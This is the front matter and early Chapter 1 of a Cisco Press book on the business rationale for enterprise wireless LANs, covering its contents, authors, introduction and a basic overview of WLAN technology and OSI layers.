The Business Case For Enterprise

The Business Case for Enterprise-Class Wireless Lans
By H. David Castaneda, Oisin Mac Alasdair, Christopher A. L. Vinckier

...............................................
Publisher: Cisco Press
Pub Date: May 16, 2006
Print ISBN-10: 1-58720-125-9
Print ISBN-13: 978-1-58720-125-7
Pages: 456
Table of Contents | Index
A comprehensive guide to analyzing the business rationale for WLANs

Evaluate the business rationale behind the deployment of WLANs, including return on investment
(ROI), net present value, payback period, and total cost of ownership
Develop a robust execution plan to deploy and operate the WLAN
Understand the high-level technical issues of deploying and managing your WLAN from a business
decision-maker's perspective
Maximize the positive impact of supplementary and complementary services such as voice, video,
and guest WLAN access
Identify potential security threats and develop strategies to mitigate attacks
Learn methodological and technical best practices from WLAN deployment case studies featuring
real-world, enterprise-class businesses and institutions
Gather information easily by referring to quick reference sheets and appendixes covering an
antenna overview, a high-level sample project plan, checklists, and flowcharts
Businesses today are increasingly adopting wireless LANs (WLANs) as a primary data transport
mechanism. To determine when and how to effectively deploy WLANs, business managers, project
managers, and IT executives need a clear, holistic evaluation of the business benefits and risks behind
this complex technology solution.
The Business Case for Enterprise-Class Wireless LANs helps you make the right decisions by explaining
the business value and cost of investing in a WLANfrom security and architecture to deployment and
application. Using a lifecycle perspective, this guide covers the value proposition, cost justification, and
alignment of security, design, and operational components within the business.
Written in an approachable style, The Business Case for Enterprise-Class Wireless LANs provides a
baseline analysis of WLAN technologies for a large-scale deployment and includes concise real-world
case studies with checklists and flowcharts that you can adapt for your needs. By recognizing the
obstacles and advantages of implementing a WLAN from a strategic and justified business perspective,
you can apply the economic benefits to your organization and ensure a timely and efficient deployment
of your organization's WLAN.
This volume is in the Network Business Series offered by Cisco Press. Books in this series provide IT
executives, decision makers, and networking professionals with pertinent information about today's
most important technologies and business strategies.
The Business Case for Enterprise-Class Wireless Lans

By H. David Castaneda, Oisin Mac Alasdair, Christopher A. L. Vinckier
...............................................
Publisher: Cisco Press
Pub Date: May 16, 2006
Print ISBN-10: 1-58720-125-9
Print ISBN-13: 978-1-58720-125-7
Pages: 456
Table of Contents | Index
Copyright
About the Authors
About the Technical Reviewers
Acknowledgments
Icons Used in This Book
Command Syntax Conventions
Introduction
Chapter 1. Introduction to Wireless LAN Technologies
Value of Mobility
OSI Layers and WLANs
A Brief History of WLANs
How Wireless Networks Function
Summary
Endnotes
Chapter 2. Business Considerations
Aligning Technology Solutions with Business Considerations
Economic Considerations
The Role of Infrastructure
Measuring the Business Value of Deploying Wireless
Summary
Chapter 3. Preparation and Planning
Solutions Lifecycle
Preparation
Planning
Summary
Chapter 4. Supplementary and Complementary Services
Voice
Video
Guest Networking
WLAN Location Services
Summary
Additional Resources
Chapter 5. Guidelines for A Successful Architecture and Design

Architectural Considerations
Design Considerations
Environmental Considerations
Summary
Chapter 6. Wireless LAN Deployment Considerations
In-House Deployment Versus Outsourced Deployment
Architectural Milestones
Deployment Dependencies
Management
Support
Deploying the WLAN
WLAN Controller Configuration
WLAN Controller Installation
Deployment Checklist
Summary
Chapter 7. Security and Wireless LANs
Wireless Security in Your Enterprise
WLAN Security Threats
Wireless Security Mitigation Techniques
Building a Secure WLAN
Summary
Chapter 8. Management Strategies for Wireless LANs
Solutions Lifecycle
Management Strategies
FCAPS
Comparing Centralized and Distributed Management
WLAN Management
Challenges Unique to WLAN Management
Security Settings Management
WLAN Reporting and Alerting
Management Tools
Summary
Chapter 9. Enterprise Case Study
Business Model
Technology Considerations
Enhanced Services
Security
Deployment and Implementation
Ongoing Project Management and Process
Business Benefits of the Solution
What the Future Holds
Summary
Endnotes
Chapter 10. Healthcare Case Study
Business Model
Project Management and Process
Summary
Chapter 11. Manufacturing Case Study
Business Model
Deployment
Summary
Chapter 12. Education Case Study
Business Model
Architectural Principles
Network Management
Service and Support
Client Management
Security and Rogue AP Detection
Challenges
Lessons Learned and Recommendations
Measuring the Benefits
Summary
Appendix A. Wireless LAN Standards Reference
Appendix B. Wireless LAN Security References
Cisco Resources
WEP
WPA
WPA2
802.1x
EAP Types
Vulnerabilities
Appendix C. Example Project Plan for an Enterprise-Class WLAN Deployment
Company Background
The Project Plan
Summary
Glossary
Numbers
A
B
C
D
E
F
G
H
I
K
L
M
O
P
Q
R
S
T
U
V
W
Index
Copyright
The Business Case for Enterprise-Class Wireless LANs
H. David Castaneda, Oisin Mac Alasdair, Christopher A. L. Vinckier
Copyright 2006 Cisco Systems, Inc.
Published by:
Cisco Press
800 East 96th Street
Indianapolis, IN 46240 USA
All rights reserved. No part of this book may be reproduced or transmitted in any form or by any means,
electronic or mechanical, including photocopying, recording, or by any information storage and retrieval
system, without written permission from the publisher, except for the inclusion of brief quotations in a
review.
Printed in the United States of America 1 2 3 4 5 6 7 8 9 0
First Printing May 2006
Library of Congress Cataloging-in-Publication Number: 2004104127
Warning and Disclaimer

This book is designed to provide information about wireless LANs. Every effort has been made to make
this book as complete and as accurate as possible, but no warranty or fitness is implied.
The information is provided on an "as is" basis. The authors, Cisco Press, and Cisco Systems, Inc., shall
have neither liability nor responsibility to any person or entity with respect to any loss or damages
arising from the information contained in this book or from the use of the discs or programs that may
accompany it.
The opinions expressed in this book belong to the authors and are not necessarily those of Cisco
Systems, Inc.
Feedback Information
At Cisco Press, our goal is to create in-depth technical books of the highest quality and value. Each book
is crafted with care and precision, undergoing rigorous development that involves the unique expertise
of members from the professional technical community.
Readers' feedback is a natural continuation of this process. If you have any comments regarding how we
could improve the quality of this book or otherwise alter it to better suit your needs, you can contact us
through e-mail at feedback@ciscopress.com. Please make sure to include the book title and ISBN in your
message.
We greatly appreciate your assistance.
Trademark Acknowledgments
All terms mentioned in this book that are known to be trademarks or service marks have been
appropriately capitalized. Cisco Press or Cisco Systems, Inc. cannot attest to the accuracy of this
information. Use of a term in this book should not be regarded as affecting the validity of any trademark
or service mark.
Publisher Paul Boger

Cisco Representative Anthony Wolfenden
Cisco Press Program Manager Jeff Brady
Executive Editor Mary Beth Ray
Production Manager Patrick Kanouse
Development Editor Dayna Isley
Senior Project Editor San Dee Phillips
Copy Editor Ben Lawson Publishing
Technical Editors John Elliott, Fred Niehaus, Jack Unger
Editorial Assistant Raina Han
Book and Cover Designer Louisa Adair
Composition Mark Shirar
Indexer Tim Wright
Proofreader Karen A. Gill
Dedications
We dedicate this book to our parents, spouses, and children.
About the Authors

H. David Castaneda is a senior technical member of the Cisco Systems Advisory Services group. In
this role, he is responsible for consulting with the top-tier customers of Cisco about the value and
application of advanced technologies. Before his current role, David was the architect and technical lead
for the internal wireless LAN strategy and deployment at Cisco. During his eight-year tenure at Cisco, he
has held various positions in the United States and Europe.
Oisin Mac Alasdair is an IT program manager with the Cisco Intelligent Network Solutions group within
IT infrastructure. Oisin has been responsible for the Cisco enterprise wireless strategy and architecture
for the past six years. He continues to define Cisco IT's wireless direction and represents Cisco IT's
strategy and vision for wireless technologies to customers, the media, and the business. Before joining
Cisco, Oisin had several architectural and consultancy roles with Fortune 100 companies in the finance
and IT industries in the Asia-Pacific region and Europe. Oisin is the proud father of a brand new baby girl
and is a loving husband to his beautiful Australian wife.
Christopher A. L. Vinckier is an engagement manager with the Cisco Systems Advisory Services
group. In this role, he assists customers in solving the perennial problems of business technology
alignment, adoption, and absorption. He has advised several of the largest Fortune 500 customers of
Cisco on the strategic, operational, and financial benefits of IP-based infrastructure solutions.
Christopher holds an MS in computer engineering from the University of Ghent, Belgium and an MBA in
finance from MIT's Sloan School of Management.
About the Technical Reviewers

John Elliott, No. CCIE 2095, has worked in communications for 15 years and has been at Cisco more
than 8 years. He has worked with 802.11 technologies since Cisco acquired Aironet in 1999 and has
worked with deployments of 802.11 both large and small using 802.11a, 802.11b, and 802.11g. He also
has extensive experience in wireless security and has worked with many customers in deploying 802.1x,
Wi-Fi Protected Access (WPA), WPA2, and other security technologies. He has also worked in
deployments of wireless managements systems such as the Cisco WLSE. John earned a bachelor of
science in computer science at the University of Arkansas at Fayetteville.
Fred Niehaus is a technical marketing engineer for the wireless networking business unit at Cisco
Systems, Inc. Fred has extensive customer contact and is responsible for developing and marketing
enterprise-class wireless solutions using Cisco Aironet and Airespace Series Wireless LAN products.
Before joining the Cisco wireless networking business unit as a result of the acquisition of Aironet, Fred
worked as a support engineer for Telxon Inc., designing some of the very first wireless implementations
for customers such as Wal-Mart, Ford, Hertz Rent-ACar, and Kroger. Fred has been in the data
communications and networking industry for the past 20 years and holds a Radio Amateur (Ham)
License "N8CPI."
Jack Unger, founder and president of Ask-Wi.Com, Inc., and Wireless InfoNet, Inc., has served the
broadband wireless industry continuously since 1993 designing, installing, troubleshooting, and
optimizing wireless networks. Jack also serves as a wireless-industry trainer and author. His vendorneutral handbook, Deploying License-Free Wireless Wide-Area Networks, was published in 2003 by Cisco
Press. In workshops across the United States and Canada, Jack has personally trained more than 1500
ISP personnel in the deployment of outdoor wireless networks.
Acknowledgments
Jim Schachterle deserves a tremendous amount of kudos for his contribution as the initial editor of this
book. In addition to being knowledgeable, organized, flexible, and helpful, he also was an exceptionally
patient coach in kick-starting this project.
Mary Beth Ray did a superb job managing this project to the end. Her positive attitude and
receptiveness made our job a lot easier.
Thanks to Raina Han for her belief in us, her inexhaustible dedication to the project as the editorial
assistant, her timely cracking of the whip, and her exquisite sense of humor.
Thanks to Dayna Isley as the development editor of Cisco Press for her top-notch editing, attention to
detail, and timeliness.
The entire Cisco Press team worked tirelessly behind the scenes. We wish to thank everybody in
editorial, illustration, layout, and the rest of the production team for their contributions.
John Elliott, Fred Niehaus, and Jack Unger the technical reviewers, made this book much better than we
could have hoped to achieve on our own. We thank them for their expertise, advice, and editing.
Thanks to Bill Coyle, Pat Regan, Bill Hodge, Dennis Virkler, Doug Roberts, Dave Hemendinger, and the
Cisco IT WLAN team for their contributions on the case studies.
Acknowledgments from H. David Castaneda: I would like to acknowledge the many people who, over
time, have influenced and provided the opportunities that have made me a success today. Personally I
would like to acknowledge my fellow authors, the Cisco EMEA networking team, and especially the Cisco
wireless networking business unit, who have supported us over time in developing our skills and
experience in the wireless world. Finally, and most importantly to my family, my wife Liinu who keeps
me centered and is my constant supporter, my son Noah and daughter Nella who have had to deal with
the many moments when I did not have time for them. This book is for them.
Acknowledgments from Oisin Mac Alasdair: I would like to thank my coauthors for their partnership,
Bruce Scott and David Renaud of Griffith University for their friendly assistance, Sergey Shitov of Cisco
IT for being an inspiration to work with and a world-class technical lead in the Cisco wireless space for
many years, and Sarah, my ever-patient wife and mother to our beautiful new baby girl: "This one's for
you, Niamh!"
Acknowledgments from Christopher A. L. Vinckier: I would like to thank my parents for their dedication
and for helping me get where I am today. Dad continues to be the source of inspiration for intellectual
curiosity and Mom for instilling in me the pursuit of excellence. I also want to thank David and Oisin for
making this project as fun as it has been, my friends from MIT for bouncing ideas off and keeping me
focused, and finally Lana for her patience, understanding, and support, and for making me start every
day with a smile.
Finally, we want to acknowledge our friends at Cisco who have always been very supportive of this
effort. We especially wish to thank our managers Mike Norman, Greg Duncan, Dave Evans, Stuart Doyle,
Chris Webber, and Paul McNabb for their patience and support.
Icons Used in This Book
Command Syntax Conventions

The conventions used to present command syntax in this book are the same conventions used in the
IOS Command Reference. The Command Reference describes these conventions as follows:
Boldface indicates commands and keywords that are entered literally as shown. In actual
configuration examples and output (not general command syntax), boldface indicates commands
that are manually input by the user (such as a show command).
Italics indicate arguments for which you supply actual values.
Vertical bars (|) separate alternative, mutually exclusive elements.
Square brackets [ ] indicate optional elements.
Braces { } indicate a required choice.
Braces within brackets [{ }] indicate a required choice within an optional element.
Introduction
Several good books have been written on the various technical aspects of wireless local-area networks
(WLANs), including devices, networking protocols, and radio technologies. Network designers and
administrators wanting to learn and apply the technical nuts and bolts of WLANs have no shortage of
reference material to consult.
What is more challenging to find is a single reference on the lifecycle aspects of WLAN solutionsthat is, a
guide that covers the business considerations, which include the value proposition, cost-justification, and
alignment of security, architecture, and operational components with the business. We wrote this book
to address that shortage by examining WLANs from a lifecycle perspective. The scope extends from the
identification of the business value that a WLAN can bring to your organization to how to build and
operate your enterprise-class WLAN.
Today, the evolution of WLANs and the subsequent penetration into the enterprise market have moved
faster than ever expected. This trend is expected to accelerate over the next couple of years. However,
the increased and accelerated up-take will not occur haphazardly. Following the IT investment frenzy of
the 1990s, scrutiny and accountability have become the new norms when it comes to evaluating and
pursuing technology investments. Understanding the intricacies of a technology provides little value
when evaluating the business benefits that IT management requires. Indeed, it is more crucial to
understand the organizational value that the technology solution offers and the risks that are inherently
associated with it. These requirements drive an increased need for understanding how a particular
technological solution can impact your organization, why an investment in the technology makes
economic sense for the organization, and what the organization should do in terms of architecture,
deployment, and operation strategies.
The nature of LANs has evolved to include the adoption of wireless transport as a primary medium.
Today, enterprise-class equipment and solutions enable companies to pursue aggressively an investment
in wireless LAN technology. However, this relatively simple transport mechanism can quickly become
complex when introduced into the enterprise.
A holistic assessment of the opportunity to leverage WLANs in an organization requires not only an indepth understanding of the strengths and weaknesses of WLAN technologies but also identification of
opportune areas of application and legitimizing of the use of WLANs in your specific organizational
ecosystem. Economic considerations must be made, and various methodologies and frameworks can be
drawn upon to develop a relevant and robust WLAN business case. This process will not only ensure a
comprehensive approach for the evaluation on WLANs but also increase the speed and accuracy of the
assessment of the business proposal by the key stakeholders.
When the time comes to tackle the question of how to plan, design, implement, and operate a WLAN in a
scalable, reliable, and secure fashion in your organization, it will quickly become clear that these
domains are inherently strewn with barriers.
The Business Case for Enterprise-Class Wireless LANs takes a business approach to wireless networking.
This goal is achieved by focusing more on strategic and business justifications and less on the intricacies
of the underlying technology. However, a baseline analysis of WLAN technology is included, empowering
you to understand the complex technology-related decisions detailed later. Most books on WLANs go into
great technical detail and are therefore off-putting to our audience. Therefore, this book will not cover
WLAN technology to that degree of detail.
The book also provides advice on the business and high-level technical issues you should consider.
Specifically, the book offers guidance on how to identify and mitigate challenges surrounding large-scale
enterprise deployments. Finally, because real-world examples form a valuable baseline against which to
compare your specific WLAN consideration, various case studies of WLAN deployments in large
organizations are included to complement and ground the theoretical methodologies and frameworks.
Objectives
Among the many concerns that arise when considering WLANs for an enterprise environment, several
are more common than others and clearly stand out. These recurring apprehensions include
No clear view of the benefits
Security concerns
Budgetary constraints
Additional worries include such items as performance and reliability, network coverage, lack of expertise,
and management challenges.
The goal of this book is to address these concerns by arming you with the necessary information to
assess the value of WLANs in your organizations and develop a robust execution plan to deploy and
operate the WLAN. The book is not intended as a highly technical guide for network engineers. Instead,
its goal is to provide upper and middle management with the necessary technological understanding of
WLANs to perform a realistic and sound assessment of WLAN investment and deployment decisions. In
addition, the book intends to assist program managers and project staff who are responsible for the
actual deployment by conveying recommended practices, exposing known risks, and imparting
remediation techniques.
For this purpose, the book leverages the PPDIOO technology lifecycle to construct a phased and
exhaustive approach for evaluating and managing the addition of WLANs to the IT infrastructure
portfolio. The PPDIOO lifecycle methodology consists of six distinct yet interlinked phases. The phases
are as follows:
Preparation
Planning
Design
Implementation
Operation
Optimization
As the nomenclature implies, each phase has distinct focus areas and characteristics. The methodology
adopted by the book explores each phase in depth to develop an overarching view of the considerations
that are required when exploring the potential value of deploying and operating WLANs in your
organization.
Audience
This book focuses on how to understand, identify, and manage the value that WLANs can bring to
organizations. As such, it is not designed to be a general networking topics book, and it is also not
designed to be an in-depth technical reference on WLAN technologies. The book primarily targets
business and management decision makers and those with the responsibility for architecture and
deployment of enterprise-class WLANs. The book provides advice to the decision maker on the business
and high-level technical issues they should consider for evaluating the investment decision of deploying
WLANs and ensuring the sound execution of the deployment of the WLAN.
The audience for this book can thus be segmented into a primary and secondary audience:
The primary audience consists of business decision makers who shoulder the accountability for
making the investment decision and ensuring the positive deployment and operation thereof at the
program level.
The secondary audience consists of IT engineers and project managers who are responsible for the
actual deployment and who want to strengthen their understanding of the upstream decisionmaking process and best practices for WLAN deployments.
The primary audience should possess a strong background in enterprise-level projects. Executive-level
readers should have accountability for long-term enterprise infrastructure project and programs.
Competency in strategic planning, technology delivery, and large-scale (global) deployment is highly
recommended. An understanding of Ethernet and wireless Ethernet technologies would be beneficial for
technical leadership readers.
The secondary audience should have an understanding of the target market for WLANs and their
benefits. Although it is not a necessity, the secondary audience should have a basic understanding of
wireless technology. A solid background in project management is assumed for most readers.
Organization and Approach

The Business Case for Enterprise-Class Wireless LANs focuses on the decision making and business
justification in addition to the WLAN execution program management effort. Throughout the book, you
find reader-friendly descriptions, quick reference sheets, diagrams, and visual layouts that aid in
explaining all topics. Case studies provide real-world touchpoints on the topics discussed. The book
adopts a four-part structure, as follows:
Part I, "The Fundamentals of Wireless LAN Strategic Planning," provides a succinct
technical introduction to the technology and concepts surrounding wireless networking. This section
also outlines the strategic rationale and business drivers that you will have to consider when
contemplating a WLAN deployment. You will be given explanations of how to construct a strategic
outlook based on financial, technological, and operational considerations, thus providing the
foundation for making well-informed business decisions. Additionally, Part I is designed to allow
you to address high-level technical architecture interests. Part I includes the following chapters:
Chapter 1, "Introduction to Wireless LAN Technologies" This chapter will help you
develop the basic understanding of WLAN technology that is needed for effectively using this
book. The OSI framework illustrates how WLANs relate to other internetworking technologies,
including LAN, WAN, and mobile cellular solutions. The framework will also help position the
WLAN-specific concepts that are covered throughout the remainder of this chapter.
Chapter 2, "Business Considerations" This chapter provides frameworks for tackling the
challenge of business-technology alignment and identification of opportune application points
for WLANs within the organizational ecosystem. Quantitative, qualitative, and risk
considerations are covered to provide an exhaustive view. Finally, given the importance of
economic returns, the most common financial barometers including return on investment,
payback period, Net Present Value, and internal rate of return are described in detail.
Chapter 3, "Preparation and Planning" This chapter focuses on the preparation and
planning considerations that are critical for successfully deploying your enterprise WLAN. Our
aim is to provide a structured approach for your deployment, highlighting areas that require
preparatory work, as you need to identify management and technical dependencies that are
unique to your context.
Chapter 4, "Supplementary and Complementary Services" This chapter covers
supplementary services and applications. These include voice, video, guest WLAN acess, and
location-based services (LBS). Complementary and supplementary services greatly increase
the complexity of your network by adding several incremental challenges. This chapter
outlines the benefits and challenges that are associated with each enhanced service. In
addition, strategies to identify the proper mix and implementation of these services are
discussed to maximize the positive impact and success of the services.
Part II, "Wireless LAN Architecture, Design, and Deployment," addresses the key areas of
architecting, designing, and deploying an enterprise-class WLAN. Most of the concepts focus on
enterprise deployments, although some examples are easily transposable to non-enterprise
environments. This part also deals with the challenges of WLAN security, which covers security
concepts, threats, and mitigation strategies in more detail. Finally, Part II provides recommended
practices for managing your WLAN after it has been deployed. This part of the book includes the
following chapters:
Chapter 5, "Guidelines for a Successful Architecture and Design" This chapter
demystifies the process of creating a scalable and robust WLAN design. The focus is on
providing a structured catalog of fundamental architectural considerations that will help you
construct an efficiently functioning WLAN. The chapter also provides recommendations on how
to develop a successful architecture. Finally, it clarifies the most important technical aspects
of wireless LANs that do not apply to traditional wired ones.
Chapter 6, "Wireless LAN Deployment Considerations" This chapter discusses the
implementation considerations that are required when deploying an enterprise-class WLAN.
Enterprise-class WLAN deployments are complex and lengthy processes that include many
interdependent factors. Methodologies and frameworks are provided that will help guide the
WLAN deployment along the critical path and minimize the execution risk associated with the
program.
Chapter 7, "Security and Wireless LANs" This chapter describes how to think securely in
the context of IT communications infrastructure. Fundamental security vulnerabilities are
tackled, and methods are provided for identifying security threats. Security terms and
protocols are introduced in addition to key WLAN security components and security standards.
Finally, the chapter discusses how to address the security threat and craft a scalable security
management strategy and platform.
Chapter 8, "Management Strategies for Wireless LANs" This chapter introduces the
fundamentals of wireless network management, the unique challenges associated with
managing wireless networks, and the various strategies that can be adopted to support this
critical area.
Part III, "Wireless LAN Deployment Case Studies," provides real-world case studies of WLAN
solutions implemented by various enterprise-class institutions. These studies outline the
requirements and constraints from these institutions and reveal the recommended practices for
each. Key hurdles and lessons learned from actual deployments complement the ideals and
theoretical notions outlined in this book. This part includes the following chapters:
Chapter 9, "Enterprise Case Study" This chapter provides a detailed case study of the
global WLAN deployment of Cisco Systems Inc. The question for Cisco IT was not whether
WLANs should be deployed, because Cisco had long since identified the many benefits offered
by the technology, but rather how Cisco could cost-effectively maintain control, reduce overall
support costs, ensure that a secure wireless infrastructure was used, and still provide benefits
to Cisco employees. This chapter discusses why and how Cisco pursued its enterprise-wide
WLAN deployment.
Chapter 10, "Healthcare Case Study" This chapter covers the strategic drivers of
Lifespan's WLAN deployment and the progressive uses of WLAN in the healthcare
environment. The WLAN's impact on Lifespan's business model is discussed, as is the strategy
that the organization employed for designing, implementing, and operating its WLAN solution.
Chapter 11, "Manufacturing Case Study" This chapter discusses a deployment of a WLAN
in a large and successful manufacturing company. The specific demands and constraints that
the manufacturing industry imposes on WLANs are touched upon, as are the strategies that
the company employed to accommodate these specific needs.
Chapter 12, "Education Case Study" This chapter introduces an extremely successful
deployment of WLANs in the educational vertical. Griffith University in Queensland, Australia,
deployed a university-wide WLAN to provide increased IT services, reduce the load on existing
computing labs, and supplement the existing wired network infrastructure. This chapter
covers the rationale for providing students and staff with the mobility benefits offered by
WLAN technology and how the university executed its plan.
Part IV, "Appedixes," includes the following:
Appendix A, "Wireless LAN Standards Reference" This appendix provides summary
descriptions of the various WLAN standards, including the infamous "802.11 alphabet soup."
Appendix B, "Wireless LAN Security References" This appendix provides descriptions
and definitions of the many facets of WLAN security.
Appendix C, "Example Project Plan for an Enterprise-Class WLAN Deployment" This

appendix is composed of examples that have been proven to be successful in developing and
deploying an enterprise-class WLAN.
Finally, a glossary of terms is included for your convenience and review.
Companion Website
Join ciscopress.com and register your book to receive free supplemental content for this book. To
register, visit www.ciscopress.com/title/1587201259 and follow the instructions to log in or join. After
you register your book, you can access additional materials, including a sample WLAN deployment
project plan.
Chapter 1. Introduction to Wireless LAN

Technologies
Networks have become a pervasive element of everyday life. Even though they can adopt different
physical characteristics and carry diverse payloads, they all share a common set of fundamental
attributes. The essence of a network is the fact that it connects or relates objects or devices.
The instantiation of this connection can adopt many forms. It can be intangible, as is the case in an
organizational or relational network, or it can be tangible. Examples of tangible networks include a
highway system, an electrical grid, and data communications networks. These types of networks are
designed and built to interconnect nodes so that objects can be moved between source and destination.
The highway system permits people and goods to be moved between any two points by means of a
meshed infrastructure of roads. The electrical grid transports electrons between the power generating
plants and the points of consumption. Finally, data communications networks carry informationthat is
voice, video, or datafrom respective sources to destinations. The definitions of source and destination
are purposely left open because they include people in addition to mechanical and electronic machines.
The Business Case for Enterprise-Class Wireless LANs focuses on a specific subset of data networks,
namely wireless local area networks (WLANs). As such, from here on you shall see the term network
refer exclusively to data communications networks.
This chapter introduces you to the value of mobility in data communications. Various scenarios are
presented to briefly illustrate the socioeconomic benefits of mobility solutions. This chapter focuses on
helping you develop an understanding of WLAN technology. We illustrate the OSI framework and how
WLANs relate to other internetworking technologies that include LAN, WAN, and mobile cellular solutions.
The framework will also help position the WLAN-specific concepts that are covered throughout the
remainder of this chapter.
Value of Mobility
Information has become the engine of our society. It forms the basis of entire industries as in services,
media, and advertising. Information provides a competitive advantage to other industries such as
financial services, manufacturing, and transportation. Government uses information to preempt and
address security threats. The entire educational system is based upon information transfer to pupils.
Finally, information is a means of relaxation and entertainment for many of us. Literature, music,
television, and movies are in their most abstract form sources of information. As such, information's
value and uses are tremendously varied and exceptionally wide in scope.
Over time, businesses and people have come to want and expect accessibility to their source of
information where they want it, when they want it, and how they want it. The digital revolution has
brought us one step closer to this reality. It not only spawned an entire new industrythe information
technology industrybut literally disrupted how society conducts business, functions, and entertains itself.
Many of us today are spending our professional lives trying to leverage information and technology to
create new value propositions, capture efficiencies and cost savings, and increase productivity.
In his 1995 book Being Digital, Nicholas Negroponte, director of the Massachusetts Institute of
Technology's Media Laboratory, foresaw that the digital revolution would be a catalyst for a digital flip.[1]
Negroponte postulated that content that was traditionally delivered via terrestrial channels would be
flipped onto wireless channels. An example is telephony. At the same time, content that was typically
delivered via wireless channels would be migrated onto terrestrial carriers. For example, television used
to be delivered via radio or satellite. Today, cable-based systems are displacing the wireless distribution
medium for television. Hence, there is a flip between delivery mechanisms for content. With many
different kinds of digital technologies maturing at breakneck speeds, the opportunity arose to realign the
accessibility to information. Indeed, information can be roughly categorized into two types:
Information we want access to anywhere and anytime Cellular mobile voice communications
is a prime example. Its explosive growth in terms of technologies and consumer adoption rates
supports the case of a large demand for anywhere and anytime access to information.
Information we consume in fixed locations An example would be television. Most of us do not
watch television while on the move. We watch TV at home, in a hotel room, or in a lounge. We do
not necessarily require mobility for television because we tend to associate it with relaxation and
sitting down.
Note
At the time of writing, various initiatives are underway to provide high-mobility video solutions
to consumers. The strategy is to implement video-streaming by means of next-generation
cellular technologies or by extending portable music players with video capabilities. It will be
interesting to follow the uptake and success of these mobile video solutions.
You could argue that people want to be able to watch television anywhere and anytime. The key word to
focus on in this case is anywhere because storage technologies (for example, VCRs, recordable DVDs,
and DVRs) have all but made obsolete the notion of anytime. When you consider televisions, the prime
parameters that come to mind are screen size, picture quality, and price. Mobility is most likely not on
the radar. It simply does not have a high value-proposition in the case of television. This fact supports
the low adoption rate of portable televisions. Similarly, the very high adoption rate of mobile phones,
although somewhat unexpected, does stand to reason. As such, you can make a valid distinction
between applications that demand mobility and those that do not or do so to a very low degree.
In the same way that cellular technologies have extended the Plain Old Telephone Systems (POTS)
beyond the boundaries of the wired infrastructure, WLANs extend data communications networks
beyond traditional physical boundaries. The implications are vast and complex. Management guru Dr.
Clayton Christensen coined the term disruptive technology in his book The Innovator's Dilemma.
Christensen defined a disruptive technology as a new technological innovation, product, or service that
eventually overturns the existing dominant technology in the market. This occurs despite the fact that
the disruptive technology is both radically different from the leading technology and that it often initially
performs worse than the leading technology according to existing measures of performance. A disruptive
technology thus effectively comes to dominate an existing market either by filling a role in a new market
that the older technology could not fill or by successively moving up-market through performance
improvements until finally displacing the market incumbents.
Applying Christensen's definition, wireless networks are truly a disruptive technology. They are fueling
growth in companies, capturing efficiencies, boosting productivity, and causing entire industries to
rethink their business strategies.[2]
The prime benefit of WLANs is that they enable information to be moved through the ether to the point
where it is required. There is no need for hardwiring. There is also no need for line-of-site, a barrier for
infrared communication technology. As such, WLANs provide an extendable, totally transparent means
for interconnecting entities. These entities can be personal computers (PCs), personal digital assistants
(PDAs), phones, sensors, radio frequency identification (RFID) tag transceivers, and many more. In
theory, any device that can house a radio transmitter and the appropriate software is a candidate for
becoming a WLAN node. Given the traits of transparency and the ability to connect heterogeneous types
of devices, it is important to understand the strengths and limitations of WLANs to correctly align
business or personal goals and technological solutions.
The next section provides a baseline high-level technical overview of WLANs. We compare WLANs'
positioning to other networking technologies and introduce WLAN components, their inner workings, and
operational implications. Even though this chapter is comprehensive, it is not exhaustive and does not
describe all the technical intricacies of WLAN technology.
OSI Layers and WLANs

Let us start with the idea that complex problems are usually broken down into modular components to
facilitate understanding and to make the solution more tractable. For this purpose, data communications
make use of the Open Systems Interconnection (OSI) reference model. Given the extensive coverage of
this model available in other books, this book does not intend to provide a complete and exhaustive
overview of the OSI reference model. Instead, this section provides a brief summary of the model and
focuses on the sections that are most relevant within the context of this book.
Note
The OSI model was defined by the International Organization for Standardization (ISO) and
was conceived to allow interoperability across the various platforms offered by vendors. A
provisional version of the model was first published in March 1978 and became standardized in
1979 after some minor refinements.
The OSI model breaks the overall task of communication into layers that focus on relatively delimited
and well-defined subtasks. Within this framework, two types of communication occur:
Interface Layers communicate with their neighbors through an interface. A layer presents or
receives information from its respective adjacent layers in a standardized format through this
interface.
Protocol The second type of communication is with a peer layer by means of a protocol. Peer
layers are at the same level but in different nodes. As such, network nodes can communicate
directly on a layer-by-layer basis with other network nodes. However, the semantics of this
communication are restricted to each layer.
The seven layers that make up the OSI reference model and the two communication types are illustrated
in Figure 1-1.
Figure 1-1. OSI Reference Model
Note
The number seven has no specific meaning or purpose. The ISO defined the OSI reference
model and subsequently tasked subcommittees to work out the details for each layer.
The following sections provide more detail on each of the respective OSI layers.
Layer 1: Physical Layer

The purpose of the physical layer is to perform the actual transmission of information across a link. As
such, it covers characteristics that are related to the physical properties and distinctiveness of the
network. This includes the transport medium, topology, data encoding techniques, transmission speeds,
maximum transmission distances, voltage levels, connectors, pin functions, conversion of information
into signals, and synchronization. The physical characteristics that are most important in the context of
this book are the transport medium, the topology, and the data encoding techniques. An overview of
each follows.
Transport Medium
The transport medium defines the type and characteristics of the physical channel that carries
information. In its strictest sense, the channel is used as a tunnel for electricity or electromagnetic
waves. For the purpose of this book, this section makes the distinction between electrical, optical, and
radio channels.
An electrical channel makes use of copper wires to conduct electrons or electricity from source to
destination. An optical channel employs a fiber optic cable to guide light between the emitter and the
receiver. Finally, a radio frequency (RF) channel utilizes the radio band of the electromagnetic spectrum
to carry signals. A key difference of RF is that the RF channel is not bounded or confined to the actual
physical systems but relies on the free space of air.
Indeed, RF is truly unbounded because the ether has no borders. Because RF signals are not guided by a
conduit, they can theoretically propagate in any direction. This borderless characteristic of RF has two
important implications:
External influences have a greater impact on unbounded signals and their properties because the
lack of a conduit implicitly prevents shielding from external influences.
Radio communication is always a broadcast in the sense that any device can tune into the signal.
The broadcast nature of radio communication has important implications for both WLAN technology and
applications. For example, transmissions can inherently be intercepted by any network-attached station.
When combined with nondirectional antennas, every station intercepts every transmission of every other
station. Not only does this have security implications, but it also requires methods for resolving orderly
access to the air. These implications will be covered in greater detail in Chapter 7, "Security and Wireless
LANs."
Topology
The following list describes the four basic topologies for networks consisting of three or more nodes:
Bus Network nodes are connected to a central transmission channelthat is, the bus or backbone.
Star Nodes are connected to a central hub.
Ring Network nodes are connected to one another in the shape of a closed loop.
Mesh Devices are directly connected by two or more connections to other network nodes.
Figure 1-2 illustrates the different topologies.
Figure 1-2. Network Topologies
By construction, WLANs adopt a bus topology because they use radio as their transmission channel. The
radio spectrum forms the bus, and every node always hears every transmission from every other node.
This is only true for a bus topology. Confusion might arise due to the physical layout of WLANs.
The access point (AP), which acts as a bridge, forwards all data it receives. The impression arises that
